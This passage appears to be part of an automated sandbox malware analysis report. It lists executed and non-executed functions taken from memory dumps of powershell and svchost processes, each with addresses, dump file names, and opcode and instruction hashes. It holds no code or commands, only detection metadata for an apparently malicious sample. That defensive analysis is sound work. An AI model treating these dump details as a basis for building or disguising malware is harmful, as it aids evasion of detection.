                                                        • Opcode Fuzzy Hash: 22be8906bfffb79a5044b92f1c7a3620bb0e0c65ab3be53e7b0d43de25607a40
                                                        • Instruction Fuzzy Hash: 1E2104B2E0D9AB4FE7A9EA6C5550174A2D2FF61394F5901BAC00DC71E2CF28EC14834A
                                                        Function 00007FF848E543BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2310778816.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848e50000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p>I
                                                        • API String ID: 0-3125605735
                                                        • Opcode ID: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction ID: ea51fe2cf5c2f45bc7608b4815c51a15eb67607a056e4c99eeb2fa5e8e3b7067
                                                        • Opcode Fuzzy Hash: acea96f736b984b26349af8b8b4083a90cea597e1f3e939cde55a86ae67059ec
                                                        • Instruction Fuzzy Hash: 131148F2D0D4A64FE6A8F76CA4545B4B7D1FF04794F4800B5C05DC31E6CB28AC508385
                                                        Function 00007FF848D89780 Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98eda71ee9a65ddb5fc2d1b7260c07b6050e1a509c170c05d7c7005f51734942
                                                        • Instruction ID: a3f7b0b407607905ddb1056608a91a15a20c4fdd5643f11da5341a4f276dbe8d
                                                        • Opcode Fuzzy Hash: 98eda71ee9a65ddb5fc2d1b7260c07b6050e1a509c170c05d7c7005f51734942
                                                        • Instruction Fuzzy Hash: 6831073191CB889FDB199F1CAC066B97BE1FB99310F00426FE449D3252CA70A816CBC6
                                                        Function 00007FF848C6EF03 Relevance: .1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2308339021.00007FF848C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C6D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848c6d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1c0bc5ad086b7fdb4d11167cb596ccce2f8b6bce99d0777ecb724a1e0a9b99b
                                                        • Instruction ID: 4883db4e1d891ba4794608a3cde302763ece405fd3e00626cc7fecf321da531b
                                                        • Opcode Fuzzy Hash: e1c0bc5ad086b7fdb4d11167cb596ccce2f8b6bce99d0777ecb724a1e0a9b99b
                                                        • Instruction Fuzzy Hash: D541F57180DBC48FD796DB3898559523FF0EF57260B1905EFD088CB1A3D625A84AC7A3
                                                        Function 00007FF848D8A49C Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 209eee998badf9f355c8d5e2c67267c76fcbc32f1a9350919e410699c69b3d8d
                                                        • Instruction ID: 37a785cf7bcd15544bee91216a2fb25c054efc4a2e4b9879ed7bf70e42825f95
                                                        • Opcode Fuzzy Hash: 209eee998badf9f355c8d5e2c67267c76fcbc32f1a9350919e410699c69b3d8d
                                                        • Instruction Fuzzy Hash: E421F83190CB4C4FDB59DFAC984A7E97BE0EB96331F04426BD048C3152D674A85ACB92
                                                        Function 00007FF848D833B5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction ID: 224165ec8f45dee36243f959deff86883391830e77b87c6cca6c96d1a77f018c
                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                        • Instruction Fuzzy Hash: A301447111CB084FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DB26E882CB45
                                                        Function 00007FF848D8A0FB Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 872138e1ce0f9a9984aacf871c18e90bafd83cd2cbb4da00f49dbf37e57cb14f
                                                        • Instruction ID: 94d1d6f566ff8dda8f1380afd7538f92d82b39a11fde619a578b8bd3a57a9dd1
                                                        • Opcode Fuzzy Hash: 872138e1ce0f9a9984aacf871c18e90bafd83cd2cbb4da00f49dbf37e57cb14f
                                                        • Instruction Fuzzy Hash: 75F0F63651DA8C4FD741EF2C98692D4BF90FFA5215B0400EBD548C7162E7215848C7C2

                                                        Non-executed Functions

                                                        Function 00007FF848D88BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2309707248.00007FF848D85000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D85000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_7ff848d85000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                        • API String ID: 0-2388461625
                                                        • Opcode ID: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                        • Instruction ID: 3d8f7147a5e84304f185d3bb40f427550269163d1b7fcf07320f3a8b954d83bd
                                                        • Opcode Fuzzy Hash: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                        • Instruction Fuzzy Hash: 6A21F973A0A5159AC30137BDBC656E87B82EF543B8B4501F3E218CF513DE14648B87A6

                                                        Executed Functions

                                                        Function 00007FF848D916DE Relevance: .7, Instructions: 711COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e7287dec3162a47861bb31ccadeb70b87a7db08411a146d4abf30cb98b472b0
                                                        • Instruction ID: 87fae3d702c864c108a314d6a5ec3d242c3aa7bac906e376a7a33c5946673ae0
                                                        • Opcode Fuzzy Hash: 6e7287dec3162a47861bb31ccadeb70b87a7db08411a146d4abf30cb98b472b0
                                                        • Instruction Fuzzy Hash: 6622E321E2E94A5FEB98F73894693B977D2FF98784F840579D00EC32C6CF28A8458745
                                                        Function 00007FF848D91719 Relevance: .7, Instructions: 665COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 679b7eaa2eba4f43dcf9dfd99f27c2064da91b823aabcf477652fe5446294550
                                                        • Instruction ID: f1ace5e8016fe2f107e277b0a7bb6ed2aab2facf1400da5af1b7e5ee9c3374dd
                                                        • Opcode Fuzzy Hash: 679b7eaa2eba4f43dcf9dfd99f27c2064da91b823aabcf477652fe5446294550
                                                        • Instruction Fuzzy Hash: 8B22B121F2EA495FEB98F72894693B976D2FF98784F840579D00EC32C6CF28AC458745
                                                        Function 00007FF848D920F1 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 500a0496adb432291630bd8b72eeb1cc7dd566e16a2960d00f028820dfc7b39c
                                                        • Instruction ID: 1cb6b5e6052d8574f901fb4fa6d3ae87f3b0ed89ee394b10f2ebf2fa4e05aece
                                                        • Opcode Fuzzy Hash: 500a0496adb432291630bd8b72eeb1cc7dd566e16a2960d00f028820dfc7b39c
                                                        • Instruction Fuzzy Hash: 9F511110A1E6C54FD796AB7858643767FE1DF87299F0800FBE099C7197EE18084AC356
                                                        Function 00007FF848D90AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9N_^
                                                        • API String ID: 0-1737749909
                                                        • Opcode ID: 399c7d7caae6bfc04d63d8654e41a0fee930af956a9ae740cee537c19e9b4173
                                                        • Instruction ID: 9f3b9664babaf779c28500d985eab933ad622ca5941d5fbbf26d6fe4a677c215
                                                        • Opcode Fuzzy Hash: 399c7d7caae6bfc04d63d8654e41a0fee930af956a9ae740cee537c19e9b4173
                                                        • Instruction Fuzzy Hash: 4E612626A0A5269FD741B7BDB4153FC7BA2FF843A9F444536C10CC7187CF24648687A8
                                                        Function 00007FF848D90E8E Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4N_^
                                                        • API String ID: 0-2516135240
                                                        • Opcode ID: 3fda3ad01b82312ebb684b2eeb32bacfb0d714568b4ffad7fb55976b559eacad
                                                        • Instruction ID: 60488dd31f050f424aaec370528702b875519ef09140954f2ba553c766434047
                                                        • Opcode Fuzzy Hash: 3fda3ad01b82312ebb684b2eeb32bacfb0d714568b4ffad7fb55976b559eacad
                                                        • Instruction Fuzzy Hash: 75513921A0F6865FE396B73CA8252B53FE1DF86664B0940FBD08CC7197DE1C5C468362
                                                        Function 00007FF848D907D3 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: <N_^
                                                        • API String ID: 0-1347224999
                                                        • Opcode ID: 61807102c3bbc516a187362ede24f175f5da84ef02e29e6950a4508012d01f44
                                                        • Instruction ID: 902a99c05ddc39b71e6b5c650652a141a871d94b5bf32ee95a608e04be0d5a79
                                                        • Opcode Fuzzy Hash: 61807102c3bbc516a187362ede24f175f5da84ef02e29e6950a4508012d01f44
                                                        • Instruction Fuzzy Hash: C6415C3AA1A6595FD345F72CA4792F83BA2FF80294F8440B6D048CB2D7CF346845C766
                                                        Function 00007FF848D91295 Relevance: .9, Instructions: 866COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50c4993216a330894442eb878b1418415c766951aaea0e90a2a01325b2d2806e
                                                        • Instruction ID: 3a05184b65d19da684b95df71136d08c8815b205cee7e795da3971af9a156f6a
                                                        • Opcode Fuzzy Hash: 50c4993216a330894442eb878b1418415c766951aaea0e90a2a01325b2d2806e
                                                        • Instruction Fuzzy Hash: 2731C533D0E69A4FE741B77CA8652F97BA1EF55295F0800B7C089CB193EF1C68098354
                                                        Function 00007FF848D90985 Relevance: .3, Instructions: 346COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d1e47c3b42a097712f8754f29376cbe38c82174c1fde630aa4847f9923d06622
                                                        • Instruction ID: 14863180dfb8955fab94aea561c4319d73065f3a55def5578850abed7ee786ea
                                                        • Opcode Fuzzy Hash: d1e47c3b42a097712f8754f29376cbe38c82174c1fde630aa4847f9923d06622
                                                        • Instruction Fuzzy Hash: 4AA14927B0AA269FD701BB7DB8553E97BA1EF813B5F444177C149CB083CA24648AC7E4
                                                        Function 00007FF848D909D3 Relevance: .3, Instructions: 320COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae2736655d9c2d36cdac8c28628c28e6666cd5fb0f4d833735f6b4b15f232d4b
                                                        • Instruction ID: 77f317640cba03b8aad2eaaaffc97d6737e8e0da5db5834a34090a8559267ef4
                                                        • Opcode Fuzzy Hash: ae2736655d9c2d36cdac8c28628c28e6666cd5fb0f4d833735f6b4b15f232d4b
                                                        • Instruction Fuzzy Hash: 0591392BB0A9269BD700BB7DB8193E97BA1FF843B5F444577C148CB187CA24648687E4
                                                        Function 00007FF848D90A08 Relevance: .3, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 436428f91379a4f9a2e29031a9bc8fb6566c73df744e1cf8bb7392b2c830f4a7
                                                        • Instruction ID: 3ac18b21ac6277db4a0d50b9a7e16f07bb863dd67810ec3fcc059d0354f6889a
                                                        • Opcode Fuzzy Hash: 436428f91379a4f9a2e29031a9bc8fb6566c73df744e1cf8bb7392b2c830f4a7
                                                        • Instruction Fuzzy Hash: 7781572AB0A9269BD700BB7DB8193F97BA1FF843B5F444577C148C7187CA246486C7E4
                                                        Function 00007FF848D90A10 Relevance: .3, Instructions: 301COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db7d7fe8cda170c41b2a455506b590017ee878bd06544af73edf5ec00d7437f3
                                                        • Instruction ID: 66dd6131d22bac3adafacc5ad48048e6d1823113ffc6d097a53d48765d6be30d
                                                        • Opcode Fuzzy Hash: db7d7fe8cda170c41b2a455506b590017ee878bd06544af73edf5ec00d7437f3
                                                        • Instruction Fuzzy Hash: AE81562AB0A9269BD700BB7DB8193F97BA1FF843B5F444577C148CB187CA246486C7E4
                                                        Function 00007FF848D90A48 Relevance: .3, Instructions: 270COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d585607f24b5174affced821c2930688937ac31f11befab6124931081f46f8ad
                                                        • Instruction ID: e90c80839f490dbed1c5a47cb09029ef41124b4444bf88313882ec93c449aa38
                                                        • Opcode Fuzzy Hash: d585607f24b5174affced821c2930688937ac31f11befab6124931081f46f8ad
                                                        • Instruction Fuzzy Hash: 1B71352AB0A9269BD700BB7DB8193E97BA1FF843B5F44457AC148C7187CA246486C7E4
                                                        Function 00007FF848D90778 Relevance: .2, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de8f812c3199630e5ae017cfc43004277b2795ae0a2b01c73d5ff02432964479
                                                        • Instruction ID: ff9b7526aff78a3eaeab093a1318f492af51763d51dad9a9ac6e5527299ac2fb
                                                        • Opcode Fuzzy Hash: de8f812c3199630e5ae017cfc43004277b2795ae0a2b01c73d5ff02432964479
                                                        • Instruction Fuzzy Hash: 1D514926A1E6455FD341F72C64792F83BE1EF81294F8444BAD048CB2CBDA3458498766
                                                        Function 00007FF848D90638 Relevance: .1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a9a4419d38837824396f79f21a25baf0a8d60966c44d7f42667ab7a72bccd59
                                                        • Instruction ID: ca8fa4be913ca39db05f7948e63b551e6a3b01d7c1852b84dc5d46c21b018856
                                                        • Opcode Fuzzy Hash: 8a9a4419d38837824396f79f21a25baf0a8d60966c44d7f42667ab7a72bccd59
                                                        • Instruction Fuzzy Hash: 35310521F1E9490FE798FB2CA45A379A6D2EF98795F0401BEE40EC32D7DE289C418341
                                                        Function 00007FF848D90D26 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd9e43ce10a33ac2adab22c620d26ed7fdd2206a38ff68152675505348523029
                                                        • Instruction ID: 6399d1118bf5512d547e0f2f0beafb451868579ad6cc2c9ef2165115dd456a85
                                                        • Opcode Fuzzy Hash: dd9e43ce10a33ac2adab22c620d26ed7fdd2206a38ff68152675505348523029
                                                        • Instruction Fuzzy Hash: C131B021F1E94A5FE784B6AC681A3B866D2FF98791F04017AE40DC3286DE285C458792
                                                        Function 00007FF848D90BD3 Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8b4664fcfefb545f7eee96e49bec61b017b4583bec2e5990c365d4ac5c5a7db
                                                        • Instruction ID: 6ad73fb4326215555b7d64baa0d6fc919158f98a314095dcb7f880891a7638c7
                                                        • Opcode Fuzzy Hash: a8b4664fcfefb545f7eee96e49bec61b017b4583bec2e5990c365d4ac5c5a7db
                                                        • Instruction Fuzzy Hash: 49419F35E2EA4A9FDB84FB6894693F97BE2FF89341F900479D009D3286CE3868458751
                                                        Function 00007FF848D90870 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 280ee4e3f0fb7720a4b73c04b6dd939b956bd99a6fd8ddcf693a59a9effb89ab
                                                        • Instruction ID: 87afbf30a8e14db6c6b35cdd22354c455cdd2945afae47b07b0a9ae7af003a32
                                                        • Opcode Fuzzy Hash: 280ee4e3f0fb7720a4b73c04b6dd939b956bd99a6fd8ddcf693a59a9effb89ab
                                                        • Instruction Fuzzy Hash: 0921A92996AA495FD395FB2894BD5B97FF2FF94240FC08469D408C33CACE346944C752
                                                        Function 00007FF848D922C1 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2771898944.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ff848d90000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37d96d814cf13de4e35c21b3b27e55e3e1724bdc9debd59c52f8ccd91b5be12e
                                                        • Instruction ID: 97ae3d26cb10b0426601d84323aaf654fd410eab0fbbbfdf72a816614fad838b
                                                        • Opcode Fuzzy Hash: 37d96d814cf13de4e35c21b3b27e55e3e1724bdc9debd59c52f8ccd91b5be12e
                                                        • Instruction Fuzzy Hash: CF019924D0EBC10FE781B73818292353FF0CF91284F0805AAD89CC70D7DE0859888346

                                                        Executed Functions

                                                        Function 00007FF848DB16DE Relevance: .7, Instructions: 713COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8066d742c1cf6eea7432d65916fcac35eea351fe74ae70e75ff736ab9592254
                                                        • Instruction ID: 5113f94702fef6f83837f097139b52a8a41db3c0cefea9b289186909f1eb48b0
                                                        • Opcode Fuzzy Hash: c8066d742c1cf6eea7432d65916fcac35eea351fe74ae70e75ff736ab9592254
                                                        • Instruction Fuzzy Hash: 9B22B320A2E9495FEB98FB3894597B977D2FFA8780F4405B9D40EC32C6DE28AC058745
                                                        Function 00007FF848DB1719 Relevance: .7, Instructions: 664COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffc6a47f61cb54f481617c8c75f5f66046ad324e2a3669fd91e56b237704e15f
                                                        • Instruction ID: a64497d67796e2795b173615d077fdc4a2a7748b90d3db2321754c242ab1c479
                                                        • Opcode Fuzzy Hash: ffc6a47f61cb54f481617c8c75f5f66046ad324e2a3669fd91e56b237704e15f
                                                        • Instruction Fuzzy Hash: 0022A320E2E9455FEB98FB3894597B976D2FFA87C0F4405B9D40EC32CADE28AC058745
                                                        Function 00007FF848DB20F1 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecf02349f7c123334640dd667f27c0be837a0b1c10143043c0f9eddeec63b851
                                                        • Instruction ID: aedaaae4f2e1346247544ec15d60a3ca8d0223a1500e83797fbe9f5bf93b70c1
                                                        • Opcode Fuzzy Hash: ecf02349f7c123334640dd667f27c0be837a0b1c10143043c0f9eddeec63b851
                                                        • Instruction Fuzzy Hash: 09512221A1E6C55FD786AB7858643B67FE5DF97295F0800FBE08DC7197DE08080AC356
                                                        Function 00007FF848DB0AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 9L_^
                                                        • API String ID: 0-1679237627
                                                        • Opcode ID: 17ece1e48bc26d714a396d9fe503cf636d84602b26ee6753d780a7d0d406a8e3
                                                        • Instruction ID: cbca138677764ab312857dad2efea214dbec7e16e8f1a4a26b98a29d37c4d9f2
                                                        • Opcode Fuzzy Hash: 17ece1e48bc26d714a396d9fe503cf636d84602b26ee6753d780a7d0d406a8e3
                                                        • Instruction Fuzzy Hash: 95612625A0A51A9ED701B7BDA4163FC3BA2FF943E1F444576C00CC71D7CF29644A87A8
                                                        Function 00007FF848DB0E8E Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4L_^
                                                        • API String ID: 0-2524838182
                                                        • Opcode ID: 4d12dfcc23cb2d5a913a24f90b618055c7b7d5b4b8c03d09687af03ed3af01ab
                                                        • Instruction ID: 289314bc3d0c994c507c305fe217493da80b02f4f78dd3a605c0a9799ee93119
                                                        • Opcode Fuzzy Hash: 4d12dfcc23cb2d5a913a24f90b618055c7b7d5b4b8c03d09687af03ed3af01ab
                                                        • Instruction Fuzzy Hash: E2512621B0FA861FE396B73C98652B53BE1EF96660B0940FBD08CC7197DD1C5C468366
                                                        Function 00007FF848DB1295 Relevance: .9, Instructions: 865COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000016.00000002.2892703601.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_22_2_7ff848db0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2605148c8b39e8e7b6192138fef8f2bc239f9cf3d76cd3f1fed476ac4800f8a7
